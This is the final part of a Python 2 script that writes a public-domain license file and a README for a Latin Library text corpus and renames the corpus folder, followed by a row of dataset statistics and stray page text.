fullest extent permitted by applicable law.\n- When using or citing the work, you should not imply endorsement by the author or the person who identified the work.\n\nA copy of this Mark is available at: <https://creativecommons.org/publicdomain/mark/1.0/>.' >> LICENSE.md")
print "Creating README.md ..."
os.system("touch www.thelatinlibrary.com/README.md")
os.system('printf "About the Latin Library\n=======================\n\nThe Latin Library is a collection of a wide variety of texts from the archaic period to the modern era. Altogether the corpus is about 108 MB.\n\nThese files are in the public domain, [as explained here](http://thelatinlibrary.com/about.html). For a declaration of their status in public domain, see LICENSE.md." >> README.md')
print "Renaming corpus to thelatinlibrary ..."
os.system("mv www.thelatinlibrary.com thelatinlibrary")
| 290.972222 | 7,602 | 0.826158 | 1,463 | 10,475 | 5.911825 | 0.26931 | 0.42872 | 0.497745 | 0.474043 | 0.131692 | 0.063244 | 0.026593 | 0.026593 | 0.026593 | 0 | 0 | 0.005824 | 0.06568 | 10,475 | 35 | 7,603 | 299.285714 | 0.877899 | 0.007637 | 0 | 0 | 0 | 0.148148 | 0.936207 | 0.728182 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.074074 | null | null | 0.296296 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.